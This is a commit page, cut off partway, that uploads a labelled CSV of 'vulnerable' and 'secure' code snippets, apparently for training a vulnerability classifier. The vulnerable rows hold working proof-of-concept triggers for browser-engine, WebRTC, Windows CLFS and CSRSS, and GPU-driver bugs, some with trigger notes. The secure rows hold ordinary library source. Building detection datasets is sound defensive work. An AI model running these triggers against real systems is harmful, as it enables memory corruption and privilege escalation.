maxdunhill
commited on
Commit
•
5098f9e
1
Parent(s):
2c60c9f
Upload Vulnerable code dataset 15_12_22 - Training.csv
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Vulnerable code dataset 15_12_22 - Training.csv
ADDED
@@ -0,0 +1,1234 @@
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1 |
+
text,label
|
2 |
+
"function foo(bug) {
|
3 |
+
function C(z) {
|
4 |
+
Error.prepareStackTrace = function(t, B) {
|
5 |
+
return B[z].getThis();
|
6 |
+
};
|
7 |
+
let p = Error().stack;
|
8 |
+
Error.prepareStackTrace = null;
|
9 |
+
return p;
|
10 |
+
}
|
11 |
+
function J() {}
|
12 |
+
var optim = false;
|
13 |
+
var opt = new Function(
|
14 |
+
'a', 'b', 'c',
|
15 |
+
'if(typeof a===\'number\'){if(a>2){for(var i=0;i<100;i++);return;}b.d(a,b,1);return}' +
|
16 |
+
'g++;'.repeat(70));
|
17 |
+
var e = null;
|
18 |
+
J.prototype.d = new Function(
|
19 |
+
'a', 'b', '""use strict"";b.a.call(arguments,b);return arguments[a];');
|
20 |
+
J.prototype.a = new Function('a', 'a.b(0,a)');
|
21 |
+
J.prototype.b = new Function(
|
22 |
+
'a', 'b',
|
23 |
+
'b.c();if(a){' +
|
24 |
+
'g++;'.repeat(70) + '}');
|
25 |
+
J.prototype.c = function() {
|
26 |
+
if (optim) {
|
27 |
+
var z = C(3);
|
28 |
+
var p = C(3);
|
29 |
+
z[0] = 0;
|
30 |
+
e = {M: z, C: p};
|
31 |
+
}
|
32 |
+
};
|
33 |
+
var a = new J();
|
34 |
+
// jit optim
|
35 |
+
if (bug) {
|
36 |
+
for (var V = 0; 1E4 > V; V++) {
|
37 |
+
opt(0 == V % 4 ? 1 : 4, a, 1);
|
38 |
+
}
|
39 |
+
}
|
40 |
+
optim = true;
|
41 |
+
opt(1, a, 1);
|
42 |
+
return e;
|
43 |
+
}
|
44 |
+
|
45 |
+
e1 = foo(false);
|
46 |
+
console.log(e1.M === e1.C); // prints true.
|
47 |
+
e2 = foo(true);
|
48 |
+
console.log(e2.M === e2.C); // should be true as above but prints false.",0 (vulnerable)
|
49 |
+
"<html>
|
50 |
+
<head>
|
51 |
+
<script>
|
52 |
+
|
53 |
+
var canvas = document.createElement('canvas');
|
54 |
+
|
55 |
+
function createConnection() {
|
56 |
+
var pc = new RTCPeerConnection({
|
57 |
+
iceServers: [],
|
58 |
+
iceTransportPolicy: 'relay'
|
59 |
+
});
|
60 |
+
|
61 |
+
var encodings = [];
|
62 |
+
for (var i = 0; i < 2; i++) {
|
63 |
+
encodings.push({ rid: String.fromCharCode(97 + i) });// rid must be alphabetic and unique
|
64 |
+
}
|
65 |
+
pc.addTransceiver(canvas.captureStream(0).getTracks()[0], { sendEncodings: encodings });
|
66 |
+
return pc;
|
67 |
+
}
|
68 |
+
|
69 |
+
|
70 |
+
function sdp_munge(offer) {
|
71 |
+
let sdp = offer.sdp;
|
72 |
+
sdp = sdp.replace(/\r?\na=rid:(.+)\s+send\r?\na=simulcast:send\s+.+;\1/, '');
|
73 |
+
offer.sdp = sdp;
|
74 |
+
return offer;
|
75 |
+
}
|
76 |
+
|
77 |
+
|
78 |
+
async function trigger(pc) {
|
79 |
+
var pc = createConnection(); // create an WebRTC connection with
|
80 |
+
var offer = await pc.createOffer(); // create an offer
|
81 |
+
var munged_offer = sdp_munge(offer); // remove one of the send_codecs_ from the offer
|
82 |
+
await pc.setLocalDescription(munged_offer); // set the local description with the sdp
|
83 |
+
}
|
84 |
+
|
85 |
+
|
86 |
+
trigger();
|
87 |
+
|
88 |
+
|
89 |
+
</script>
|
90 |
+
</head>
|
91 |
+
</html>",0 (vulnerable)
|
92 |
+
"__int64 __fastcall CClfsBaseFilePersisted::RemoveContainer(CClfsBaseFilePersisted *this, unsigned int a2)
|
93 |
+
{
|
94 |
+
...
|
95 |
+
v11 = CClfsBaseFilePersisted::FlushImage((PERESOURCE *)this);
|
96 |
+
v9 = v11;
|
97 |
+
v16 = v11;
|
98 |
+
if ( v11 >= 0 )
|
99 |
+
{
|
100 |
+
pContainer = *((_QWORD *)containerContext + 3);
|
101 |
+
if ( pContainer )
|
102 |
+
{
|
103 |
+
*((_QWORD *)containerContext + 3) = 0i64;
|
104 |
+
ExReleaseResourceForThreadLite(*((PERESOURCE *)this + 4), (ERESOURCE_THREAD)KeGetCurrentThread());
|
105 |
+
v4 = 0;
|
106 |
+
(*(void (__fastcall **)(__int64))(*(_QWORD *)pContainer + 0x18i64))(pContainer); // remove method
|
107 |
+
(*(void (__fastcall **)(__int64))(*(_QWORD *)pContainer + 8i64))(pContainer); // release method
|
108 |
+
v9 = v16;
|
109 |
+
goto LABEL_20;
|
110 |
+
}
|
111 |
+
goto LABEL_19;
|
112 |
+
}
|
113 |
+
...
|
114 |
+
} v44 = *((_DWORD *)containerContext + 5); // to trigger RemoveContainer one should set this field to -1
|
115 |
+
if ( v44 == -1 )
|
116 |
+
{
|
117 |
+
*((_QWORD *)containerContext + 3) = 0i64; // pContainer is set to NULL
|
118 |
+
v20 = CClfsBaseFilePersisted::RemoveContainer(this, v34);
|
119 |
+
v72 = v20;
|
120 |
+
if ( v20 < 0 )
|
121 |
+
goto LABEL_134;
|
122 |
+
v23 = v78;
|
123 |
+
v34 = (unsigned int)(v34 + 1);
|
124 |
+
v79 = v34;
|
125 |
+
} ...
|
126 |
+
// Obtain all container contexts represented in blf
|
127 |
+
// save pContainer class pointer for each valid container context
|
128 |
+
for ( i = 0; i < 0x400; ++i )
|
129 |
+
{
|
130 |
+
v20 = CClfsBaseFile::AcquireContainerContext(this, i, &v22);
|
131 |
+
v15 = (char *)this + 8 * i;
|
132 |
+
if ( v20 >= 0 )
|
133 |
+
{
|
134 |
+
v16 = v22;
|
135 |
+
*((_QWORD *)v15 + 56) = *((_QWORD *)v22 + 3); // for each valid container save pContainer
|
136 |
+
*((_QWORD *)v16 + 3) = 0i64; // and set the initial pContainer to zero
|
137 |
+
CClfsBaseFile::ReleaseContainerContext(this, &v22);
|
138 |
+
}
|
139 |
+
else
|
140 |
+
{
|
141 |
+
*((_QWORD *)v15 + 56) = 0i64;
|
142 |
+
}
|
143 |
+
}
|
144 |
+
// Stage [1] enode block, prepare it for writing
|
145 |
+
ClfsEncodeBlock(
|
146 |
+
(struct _CLFS_LOG_BLOCK_HEADER *)v9,
|
147 |
+
*(unsigned __int16 *)(v9 + 4) << 9,
|
148 |
+
*(_BYTE *)(v9 + 2),
|
149 |
+
0x10u,
|
150 |
+
1u);
|
151 |
+
// write modified data
|
152 |
+
v10 = CClfsContainer::WriteSector(
|
153 |
+
*((CClfsContainer **)this + 19),
|
154 |
+
*((struct _KEVENT **)this + 20),
|
155 |
+
0i64,
|
156 |
+
*(void **)(*((_QWORD *)this + 6) + 24 * v8),
|
157 |
+
*(unsigned __int16 *)(v9 + 4),
|
158 |
+
&v23);
|
159 |
+
...
|
160 |
+
if ( v7 )
|
161 |
+
{
|
162 |
+
// Stage [2] Decode file again for futher processing in clfs.sys
|
163 |
+
ClfsDecodeBlock((struct _CLFS_LOG_BLOCK_HEADER *)v9, *(unsigned __int16 *)(v9 + 4), *(_BYTE *)(v9 + 2), 0x10u, &v21);
|
164 |
+
// optain new pContainer class pointer
|
165 |
+
v17 = (_QWORD *)((char *)this + 448);
|
166 |
+
do
|
167 |
+
{
|
168 |
+
// Stage [3] for each valid container
|
169 |
+
// update pContainer field
|
170 |
+
if ( *v17 && (int)CClfsBaseFile::AcquireContainerContext(this, v6, &v22) >= 0 )
|
171 |
+
{
|
172 |
+
*((_QWORD *)v22 + 3) = *v17;
|
173 |
+
CClfsBaseFile::ReleaseContainerContext(this, &v22);
|
174 |
+
}
|
175 |
+
++v6;
|
176 |
+
++v17;
|
177 |
+
}
|
178 |
+
while ( v6 < 0x400 );
|
179 |
+
}
|
180 |
+
...",0 (vulnerable)
|
181 |
+
"static struct kbase_va_region *kbase_mem_from_user_buffer(
|
182 |
+
struct kbase_context *kctx, unsigned long address,
|
183 |
+
unsigned long size, u64 *va_pages, u64 *flags)
|
184 |
+
{
|
185 |
+
[...]
|
186 |
+
+ int write;
|
187 |
+
[...]
|
188 |
+
+ write = reg->flags & (KBASE_REG_CPU_WR | KBASE_REG_GPU_WR);
|
189 |
+
+
|
190 |
+
#if KERNEL_VERSION(4, 6, 0) > LINUX_VERSION_CODE
|
191 |
+
faulted_pages = get_user_pages(current, current->mm, address, *va_pages,
|
192 |
+
#if KERNEL_VERSION(4, 4, 168) <= LINUX_VERSION_CODE && \
|
193 |
+
KERNEL_VERSION(4, 5, 0) > LINUX_VERSION_CODE
|
194 |
+
- reg->flags & KBASE_REG_CPU_WR ? FOLL_WRITE : 0,
|
195 |
+
- pages, NULL);
|
196 |
+
+ write ? FOLL_WRITE : 0, pages, NULL);
|
197 |
+
#else
|
198 |
+
- reg->flags & KBASE_REG_CPU_WR, 0, pages, NULL);
|
199 |
+
+ write, 0, pages, NULL);
|
200 |
+
#endif
|
201 |
+
#elif KERNEL_VERSION(4, 9, 0) > LINUX_VERSION_CODE
|
202 |
+
faulted_pages = get_user_pages(address, *va_pages,
|
203 |
+
- reg->flags & KBASE_REG_CPU_WR, 0, pages, NULL);
|
204 |
+
+ write, 0, pages, NULL);
|
205 |
+
#else
|
206 |
+
faulted_pages = get_user_pages(address, *va_pages,
|
207 |
+
- reg->flags & KBASE_REG_CPU_WR ? FOLL_WRITE : 0,
|
208 |
+
- pages, NULL);
|
209 |
+
+ write ? FOLL_WRITE : 0, pages, NULL);
|
210 |
+
#endif",0 (vulnerable)
|
211 |
+
"input = document.body.appendChild(document.createElement(""input""));
|
212 |
+
|
213 |
+
foo = document.body.appendChild(document.createElement(""a""));
|
214 |
+
foo.id = ""foo"";
|
215 |
+
|
216 |
+
// Go to state1 when history.back is called
|
217 |
+
// The URL needs to be <currentPage+hash> to trigger loadInSameDocument during the call to back()
|
218 |
+
// Since the foo's element id=""foo"", focus will change to that element
|
219 |
+
history.pushState(""state1"", """", location + ""#foo"");
|
220 |
+
|
221 |
+
// Current state = state2
|
222 |
+
history.pushState(""state2"", """");
|
223 |
+
|
224 |
+
setTimeout(() => {
|
225 |
+
|
226 |
+
// Set the focus on the input element.
|
227 |
+
// During the call to back() the focus will change to the foo element
|
228 |
+
// and therefore triggering the blur event on the input element
|
229 |
+
input.focus();
|
230 |
+
input.onblur = () => history.replaceState(""state3"", """");
|
231 |
+
setTimeout(() => history.back(), 1000);
|
232 |
+
}, 1000);",0 (vulnerable)
|
233 |
+
"var initKey = {init : 1};
|
234 |
+
var level = 4;
|
235 |
+
var map1 = new WeakMap();
|
236 |
+
|
237 |
+
function hideWeakMap(map, level, initKey) {
|
238 |
+
let prevMap = map;
|
239 |
+
let prevKey = initKey;
|
240 |
+
for (let i = 0; i < level; i++) {
|
241 |
+
let thisMap = new WeakMap();
|
242 |
+
prevMap.set(prevKey, thisMap);
|
243 |
+
let thisKey = {'h' : i};
|
244 |
+
thisMap.set(prevKey, thisKey);
|
245 |
+
prevMap = thisMap;
|
246 |
+
prevKey = thisKey;
|
247 |
+
if (i == level - 1) {
|
248 |
+
let retMap = new WeakMap();
|
249 |
+
map.set(thisKey, retMap);
|
250 |
+
return thisKey;
|
251 |
+
}
|
252 |
+
}
|
253 |
+
}
|
254 |
+
|
255 |
+
function getHiddenKey(map, level, initKey) {
|
256 |
+
let prevMap = map;
|
257 |
+
let prevKey = initKey;
|
258 |
+
for (let i = 0; i < level; i++) {
|
259 |
+
let thisMap = prevMap.get(prevKey);
|
260 |
+
let thisKey = thisMap.get(prevKey);
|
261 |
+
prevMap = thisMap;
|
262 |
+
prevKey = thisKey;
|
263 |
+
if (i == level - 1) {
|
264 |
+
return thisKey;
|
265 |
+
}
|
266 |
+
}
|
267 |
+
}
|
268 |
+
|
269 |
+
function setUpWeakMap(map) {
|
270 |
+
let hk = hideWeakMap(map, level, initKey);
|
271 |
+
let hiddenMap = map.get(hk);
|
272 |
+
let map7 = new WeakMap();
|
273 |
+
let map8 = new WeakMap();
|
274 |
+
let k5 = {k5 : 1};
|
275 |
+
let map5 = new WeakMap();
|
276 |
+
let k7 = {k7 : 1};
|
277 |
+
let k9 = {k9 : 1};
|
278 |
+
let k8 = {k8 : 1};
|
279 |
+
let v9 = {};
|
280 |
+
map.set(k7, map7);
|
281 |
+
map.set(k9, v9);
|
282 |
+
hiddenMap.set(k5, map5);
|
283 |
+
hiddenMap.set(hk, k5);
|
284 |
+
map5.set(hk, k7);
|
285 |
+
map7.set(k8, map8);
|
286 |
+
map7.set(k7, k8);
|
287 |
+
map8.set(k8,k9);
|
288 |
+
|
289 |
+
}
|
290 |
+
|
291 |
+
function main() {
|
292 |
+
setUpWeakMap(map1);
|
293 |
+
|
294 |
+
new ArrayBuffer(0x7fe00000);
|
295 |
+
let hiddenKey = getHiddenKey(map1, level, initKey);
|
296 |
+
let hiddenMap = map1.get(hiddenKey);
|
297 |
+
let k7 = hiddenMap.get(hiddenMap.get(hiddenKey)).get(hiddenKey);
|
298 |
+
let k8 = map1.get(k7).get(k7);
|
299 |
+
let map8 = map1.get(k7).get(k8);
|
300 |
+
|
301 |
+
console.log(map1.get(map8.get(k8)));
|
302 |
+
}
|
303 |
+
|
304 |
+
while (true) {
|
305 |
+
try {
|
306 |
+
main();
|
307 |
+
} catch (err) {}
|
308 |
+
}",0 (vulnerable)
|
309 |
+
"function store(y) {
|
310 |
+
x = y;
|
311 |
+
}
|
312 |
+
|
313 |
+
function load() {
|
314 |
+
return x.b;
|
315 |
+
}
|
316 |
+
|
317 |
+
var x = {a : 1};
|
318 |
+
var x1 = {a : 2};
|
319 |
+
var x2 = {a : 3};
|
320 |
+
var x3 = {a : 4};
|
321 |
+
|
322 |
+
store(x1);
|
323 |
+
%PrepareFunctionForOptimization(store);
|
324 |
+
store(x2);
|
325 |
+
|
326 |
+
x1.b = 1;
|
327 |
+
|
328 |
+
%OptimizeFunctionOnNextCall(store);
|
329 |
+
store(x2);
|
330 |
+
|
331 |
+
x.b = 1;
|
332 |
+
|
333 |
+
%PrepareFunctionForOptimization(load);
|
334 |
+
load();
|
335 |
+
|
336 |
+
%OptimizeFunctionOnNextCall(load);
|
337 |
+
load();
|
338 |
+
|
339 |
+
store(x3);
|
340 |
+
|
341 |
+
%DebugPrint(load());",0 (vulnerable)
|
342 |
+
"global_object = {};
|
343 |
+
|
344 |
+
setPropertyViaEmbed = (object, value, handler) => {
|
345 |
+
const embed = document.createElement('embed');
|
346 |
+
embed.onload = handler;
|
347 |
+
embed.type = 'text/html';
|
348 |
+
Object.setPrototypeOf(global_object, embed);
|
349 |
+
document.body.appendChild(embed);
|
350 |
+
object.corrupted_prop = value;
|
351 |
+
embed.remove();
|
352 |
+
}
|
353 |
+
|
354 |
+
createCorruptedPair = (value_1, value_2) => {
|
355 |
+
const object_1 = {
|
356 |
+
__proto__: global_object
|
357 |
+
};
|
358 |
+
object_1.regular_prop = 1;
|
359 |
+
|
360 |
+
setPropertyViaEmbed(object_1, value_2, () => {
|
361 |
+
Object.setPrototypeOf(global_object, null);
|
362 |
+
object_1.corrupted_prop = value_1;
|
363 |
+
});
|
364 |
+
|
365 |
+
const object_2 = {
|
366 |
+
__proto__: global_object
|
367 |
+
};
|
368 |
+
object_2.regular_prop = 1;
|
369 |
+
|
370 |
+
setPropertyViaEmbed(object_2, value_2, () => {
|
371 |
+
Object.setPrototypeOf(global_object, null);
|
372 |
+
object_2.corrupted_prop = value_1;
|
373 |
+
object_1.regular_prop = 1.1
|
374 |
+
});
|
375 |
+
return [object_1, object_2];
|
376 |
+
}
|
377 |
+
|
378 |
+
const array = [1.1];
|
379 |
+
array.prop = 1;
|
380 |
+
const [object_1, object_2] = createCorruptedPair(array, 2261620.509803918);
|
381 |
+
|
382 |
+
jit = (object) => {
|
383 |
+
return object.corrupted_prop[0];
|
384 |
+
}
|
385 |
+
for (var i = 0; i < 100000; ++i)
|
386 |
+
jit(object_1);
|
387 |
+
jit(object_2);",0 (vulnerable)
|
388 |
+
"int SetBlendDesignPositions(void *arg) {
|
389 |
+
int num_master;
|
390 |
+
Fixed16_16 values[16][15];
|
391 |
+
|
392 |
+
for (num_master = 0; ; num_master++) {
|
393 |
+
if (GetToken() != TOKEN_OPEN) {
|
394 |
+
break;
|
395 |
+
}
|
396 |
+
|
397 |
+
int values_read = GetOpenFixedArray(&values[num_master], 15);
|
398 |
+
SetNumAxes(values_read);
|
399 |
+
}
|
400 |
+
|
401 |
+
SetNumMasters(num_master);
|
402 |
+
|
403 |
+
for (int i = 0; i < num_master; i++) {
|
404 |
+
procs->BlendDesignPositions(i, &values[i]);
|
405 |
+
}
|
406 |
+
|
407 |
+
|
408 |
+
return 0;
|
409 |
+
}",0 (vulnerable)
|
410 |
+
"#include <stdint.h>
|
411 |
+
#include <stdio.h>
|
412 |
+
#include <windows.h>
|
413 |
+
#include <string>
|
414 |
+
|
415 |
+
const char* MANIFEST_CONTENTS =
|
416 |
+
""<?xml version='1.0' encoding='UTF-8' standalone='yes'?>""
|
417 |
+
""<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>""
|
418 |
+
""<assemblyIdentity name='@' version='1.0.0.0' type='win32' ""
|
419 |
+
""processorArchitecture='amd64'/>""
|
420 |
+
""</assembly>"";
|
421 |
+
|
422 |
+
const WCHAR* NULL_BYTE_STR = L""\x00\x00"";
|
423 |
+
const WCHAR* MANIFEST_NAME =
|
424 |
+
L""msil_system.data.sqlxml.resources_b77a5c561934e061_3.0.4100.17061_en-us_""
|
425 |
+
L""d761caeca23d64a2.manifest"";
|
426 |
+
const WCHAR* PATH = L""\\\\.\\c:Windows\\"";
|
427 |
+
const WCHAR* MODULE = L""System.Data.SqlXml.Resources"";
|
428 |
+
|
429 |
+
typedef PVOID(__stdcall* f_CsrAllocateCaptureBuffer)(ULONG ArgumentCount,
|
430 |
+
ULONG BufferSize);
|
431 |
+
f_CsrAllocateCaptureBuffer CsrAllocateCaptureBuffer;
|
432 |
+
|
433 |
+
typedef NTSTATUS(__stdcall* f_CsrClientCallServer)(PVOID ApiMessage,
|
434 |
+
PVOID CaptureBuffer,
|
435 |
+
ULONG ApiNumber,
|
436 |
+
ULONG DataLength);
|
437 |
+
f_CsrClientCallServer CsrClientCallServer;
|
438 |
+
|
439 |
+
typedef NTSTATUS(__stdcall* f_CsrCaptureMessageString)(LPVOID CaptureBuffer,
|
440 |
+
PCSTR String,
|
441 |
+
ULONG Length,
|
442 |
+
ULONG MaximumLength,
|
443 |
+
PSTR OutputString);
|
444 |
+
f_CsrCaptureMessageString CsrCaptureMessageString;
|
445 |
+
|
446 |
+
NTSTATUS CaptureUnicodeString(LPVOID CaptureBuffer, PSTR OutputString,
|
447 |
+
PCWSTR String, ULONG Length = 0) {
|
448 |
+
if (Length == 0) {
|
449 |
+
Length = lstrlenW(String);
|
450 |
+
}
|
451 |
+
return CsrCaptureMessageString(CaptureBuffer, (PCSTR)String, Length * 2,
|
452 |
+
Length * 2 + 2, OutputString);
|
453 |
+
}
|
454 |
+
|
455 |
+
int main() {
|
456 |
+
HMODULE Ntdll = LoadLibrary(L""Ntdll.dll"");
|
457 |
+
CsrAllocateCaptureBuffer = (f_CsrAllocateCaptureBuffer)GetProcAddress(
|
458 |
+
Ntdll, ""CsrAllocateCaptureBuffer"");
|
459 |
+
CsrClientCallServer =
|
460 |
+
(f_CsrClientCallServer)GetProcAddress(Ntdll, ""CsrClientCallServer"");
|
461 |
+
CsrCaptureMessageString = (f_CsrCaptureMessageString)GetProcAddress(
|
462 |
+
Ntdll, ""CsrCaptureMessageString"");
|
463 |
+
|
464 |
+
char Message[0x220];
|
465 |
+
memset(Message, 0, 0x220);
|
466 |
+
|
467 |
+
PVOID CaptureBuffer = CsrAllocateCaptureBuffer(4, 0x300);
|
468 |
+
|
469 |
+
std::string Manifest = MANIFEST_CONTENTS;
|
470 |
+
Manifest.replace(Manifest.find('@'), 1, 0x2000, 'A');
|
471 |
+
|
472 |
+
// There's no public definition of the relevant CSR_API_MSG structure.
|
473 |
+
// The offsets and values are taken directly from the exploit.
|
474 |
+
*(uint32_t*)(Message + 0x40) = 0xc1;
|
475 |
+
*(uint16_t*)(Message + 0x44) = 9;
|
476 |
+
*(uint16_t*)(Message + 0x59) = 0x201;
|
477 |
+
|
478 |
+
// CSRSS loads the manifest contents from the client process memory;
|
479 |
+
// therefore, it doesn't have to be stored in the capture buffer.
|
480 |
+
*(const char**)(Message + 0x80) = Manifest.c_str();
|
481 |
+
*(uint64_t*)(Message + 0x88) = Manifest.size();
|
482 |
+
*(uint64_t*)(Message + 0xf0) = 1;
|
483 |
+
|
484 |
+
CaptureUnicodeString(CaptureBuffer, Message + 0x48, NULL_BYTE_STR, 2);
|
485 |
+
CaptureUnicodeString(CaptureBuffer, Message + 0x60, MANIFEST_NAME);
|
486 |
+
CaptureUnicodeString(CaptureBuffer, Message + 0xc8, PATH);
|
487 |
+
CaptureUnicodeString(CaptureBuffer, Message + 0x120, MODULE);
|
488 |
+
|
489 |
+
// Triggers the issue by setting ApplicationName.MaxLength to a large value.
|
490 |
+
*(uint16_t*)(Message + 0x122) = 0x8000;
|
491 |
+
|
492 |
+
CsrClientCallServer(Message, CaptureBuffer, 0x10017, 0xf0);
|
493 |
+
}",0 (vulnerable)
|
494 |
+
"#include ""gtest/internal/gtest-filepath.h""
|
495 |
+
|
496 |
+
#include <stdlib.h>
|
497 |
+
|
498 |
+
#include ""gtest/gtest-message.h""
|
499 |
+
#include ""gtest/internal/gtest-port.h""
|
500 |
+
|
501 |
+
#if GTEST_OS_WINDOWS_MOBILE
|
502 |
+
#include <windows.h>
|
503 |
+
#elif GTEST_OS_WINDOWS
|
504 |
+
#include <direct.h>
|
505 |
+
#include <io.h>
|
506 |
+
#else
|
507 |
+
#include <limits.h>
|
508 |
+
|
509 |
+
#include <climits> // Some Linux distributions define PATH_MAX here.
|
510 |
+
#endif // GTEST_OS_WINDOWS_MOBILE
|
511 |
+
|
512 |
+
#include ""gtest/internal/gtest-string.h""
|
513 |
+
|
514 |
+
#if GTEST_OS_WINDOWS
|
515 |
+
#define GTEST_PATH_MAX_ _MAX_PATH
|
516 |
+
#elif defined(PATH_MAX)
|
517 |
+
#define GTEST_PATH_MAX_ PATH_MAX
|
518 |
+
#elif defined(_XOPEN_PATH_MAX)
|
519 |
+
#define GTEST_PATH_MAX_ _XOPEN_PATH_MAX
|
520 |
+
#else
|
521 |
+
#define GTEST_PATH_MAX_ _POSIX_PATH_MAX
|
522 |
+
#endif // GTEST_OS_WINDOWS
|
523 |
+
|
524 |
+
namespace testing {
|
525 |
+
namespace internal {
|
526 |
+
|
527 |
+
#if GTEST_OS_WINDOWS
|
528 |
+
// On Windows, '\\' is the standard path separator, but many tools and the
|
529 |
+
// Windows API also accept '/' as an alternate path separator. Unless otherwise
|
530 |
+
// noted, a file path can contain either kind of path separators, or a mixture
|
531 |
+
// of them.
|
532 |
+
const char kPathSeparator = '\\';
|
533 |
+
const char kAlternatePathSeparator = '/';
|
534 |
+
const char kAlternatePathSeparatorString[] = ""/"";
|
535 |
+
#if GTEST_OS_WINDOWS_MOBILE
|
536 |
+
// Windows CE doesn't have a current directory. You should not use
|
537 |
+
// the current directory in tests on Windows CE, but this at least
|
538 |
+
// provides a reasonable fallback.
|
539 |
+
const char kCurrentDirectoryString[] = ""\\"";
|
540 |
+
// Windows CE doesn't define INVALID_FILE_ATTRIBUTES
|
541 |
+
const DWORD kInvalidFileAttributes = 0xffffffff;
|
542 |
+
#else
|
543 |
+
const char kCurrentDirectoryString[] = "".\\"";
|
544 |
+
#endif // GTEST_OS_WINDOWS_MOBILE
|
545 |
+
#else
|
546 |
+
const char kPathSeparator = '/';
|
547 |
+
const char kCurrentDirectoryString[] = ""./"";
|
548 |
+
#endif // GTEST_OS_WINDOWS
|
549 |
+
|
550 |
+
// Returns whether the given character is a valid path separator.
|
551 |
+
static bool IsPathSeparator(char c) {
|
552 |
+
#if GTEST_HAS_ALT_PATH_SEP_
|
553 |
+
return (c == kPathSeparator) || (c == kAlternatePathSeparator);
|
554 |
+
#else
|
555 |
+
return c == kPathSeparator;
|
556 |
+
#endif
|
557 |
+
}
|
558 |
+
|
559 |
+
// Returns the current working directory, or """" if unsuccessful.
|
560 |
+
FilePath FilePath::GetCurrentDir() {
|
561 |
+
#if GTEST_OS_WINDOWS_MOBILE || GTEST_OS_WINDOWS_PHONE || \
|
562 |
+
GTEST_OS_WINDOWS_RT || GTEST_OS_ESP8266 || GTEST_OS_ESP32 || \
|
563 |
+
GTEST_OS_XTENSA || GTEST_OS_QURT
|
564 |
+
// These platforms do not have a current directory, so we just return
|
565 |
+
// something reasonable.
|
566 |
+
return FilePath(kCurrentDirectoryString);
|
567 |
+
#elif GTEST_OS_WINDOWS
|
568 |
+
char cwd[GTEST_PATH_MAX_ + 1] = {'\0'};
|
569 |
+
return FilePath(_getcwd(cwd, sizeof(cwd)) == nullptr ? """" : cwd);
|
570 |
+
#else
|
571 |
+
char cwd[GTEST_PATH_MAX_ + 1] = {'\0'};
|
572 |
+
char* result = getcwd(cwd, sizeof(cwd));
|
573 |
+
#if GTEST_OS_NACL
|
574 |
+
// getcwd will likely fail in NaCl due to the sandbox, so return something
|
575 |
+
// reasonable. The user may have provided a shim implementation for getcwd,
|
576 |
+
// however, so fallback only when failure is detected.
|
577 |
+
return FilePath(result == nullptr ? kCurrentDirectoryString : cwd);
|
578 |
+
#endif // GTEST_OS_NACL
|
579 |
+
return FilePath(result == nullptr ? """" : cwd);
|
580 |
+
#endif // GTEST_OS_WINDOWS_MOBILE
|
581 |
+
}",1 (secure)
|
582 |
+
"#pragma once
|
583 |
+
|
584 |
+
#include <Core/Types.h>
|
585 |
+
#include <Common/Exception.h>
|
586 |
+
#include <Common/intExp.h>
|
587 |
+
#include <base/arithmeticOverflow.h>
|
588 |
+
|
589 |
+
#include <limits>
|
590 |
+
#include <type_traits>
|
591 |
+
|
592 |
+
|
593 |
+
namespace DB
|
594 |
+
{
|
595 |
+
|
596 |
+
template <typename T>
|
597 |
+
class DataTypeNumber;
|
598 |
+
|
599 |
+
namespace ErrorCodes
|
600 |
+
{
|
601 |
+
extern const int DECIMAL_OVERFLOW;
|
602 |
+
extern const int ARGUMENT_OUT_OF_BOUND;
|
603 |
+
}
|
604 |
+
|
605 |
+
namespace DecimalUtils
|
606 |
+
{
|
607 |
+
|
608 |
+
inline constexpr size_t min_precision = 1;
|
609 |
+
template <typename T> inline constexpr size_t max_precision = 0;
|
610 |
+
template <> inline constexpr size_t max_precision<Decimal32> = 9;
|
611 |
+
template <> inline constexpr size_t max_precision<Decimal64> = 18;
|
612 |
+
template <> inline constexpr size_t max_precision<DateTime64> = 18;
|
613 |
+
template <> inline constexpr size_t max_precision<Decimal128> = 38;
|
614 |
+
template <> inline constexpr size_t max_precision<Decimal256> = 76;
|
615 |
+
|
616 |
+
template <typename T>
|
617 |
+
inline auto scaleMultiplier(UInt32 scale)
|
618 |
+
{
|
619 |
+
if constexpr (std::is_same_v<T, Int32> || std::is_same_v<T, Decimal32>)
|
620 |
+
return common::exp10_i32(scale);
|
621 |
+
else if constexpr (std::is_same_v<T, Int64> || std::is_same_v<T, Decimal64> || std::is_same_v<T, DateTime64>)
|
622 |
+
return common::exp10_i64(scale);
|
623 |
+
else if constexpr (std::is_same_v<T, Int128> || std::is_same_v<T, Decimal128>)
|
624 |
+
return common::exp10_i128(scale);
|
625 |
+
else if constexpr (std::is_same_v<T, Int256> || std::is_same_v<T, Decimal256>)
|
626 |
+
return common::exp10_i256(scale);
|
627 |
+
}
|
628 |
+
|
629 |
+
|
630 |
+
/** Components of DecimalX value:
|
631 |
+
* whole - represents whole part of decimal, can be negative or positive.
|
632 |
+
* fractional - for fractional part of decimal, always positive.
|
633 |
+
*/
|
634 |
+
template <typename DecimalType>
|
635 |
+
struct DecimalComponents
|
636 |
+
{
|
637 |
+
using T = typename DecimalType::NativeType;
|
638 |
+
T whole;
|
639 |
+
T fractional;
|
640 |
+
};
|
641 |
+
|
642 |
+
/// Traits used for determining final Type/Precision/Scale for certain math operations on decimals.
|
643 |
+
template <typename T>
|
644 |
+
struct DataTypeDecimalTrait
|
645 |
+
{
|
646 |
+
using FieldType = T;
|
647 |
+
const UInt32 precision;
|
648 |
+
const UInt32 scale;
|
649 |
+
|
650 |
+
DataTypeDecimalTrait(UInt32 precision_, UInt32 scale_)
|
651 |
+
: precision(precision_),
|
652 |
+
scale(scale_)
|
653 |
+
{}
|
654 |
+
|
655 |
+
/// @returns multiplier for U to become T with correct scale
|
656 |
+
template <typename U>
|
657 |
+
T scaleFactorFor(const DataTypeDecimalTrait<U> & x, bool) const
|
658 |
+
{
|
659 |
+
if (scale < x.scale)
|
660 |
+
throw Exception(""Decimal result's scale is less than argument's one"", ErrorCodes::ARGUMENT_OUT_OF_BOUND);
|
661 |
+
const UInt32 scale_delta = scale - x.scale; /// scale_delta >= 0
|
662 |
+
return DecimalUtils::scaleMultiplier<typename T::NativeType>(scale_delta);
|
663 |
+
}
|
664 |
+
};
|
665 |
+
",1 (secure)
|
666 |
+
"#include <SFML/System/Err.hpp>
|
667 |
+
#include <SFML/Window/SensorManager.hpp>
|
668 |
+
|
669 |
+
#include <ostream>
|
670 |
+
|
671 |
+
|
672 |
+
namespace sf
|
673 |
+
{
|
674 |
+
namespace priv
|
675 |
+
{
|
676 |
+
////////////////////////////////////////////////////////////
|
677 |
+
SensorManager& SensorManager::getInstance()
|
678 |
+
{
|
679 |
+
static SensorManager instance;
|
680 |
+
return instance;
|
681 |
+
}
|
682 |
+
|
683 |
+
|
684 |
+
////////////////////////////////////////////////////////////
|
685 |
+
bool SensorManager::isAvailable(Sensor::Type sensor)
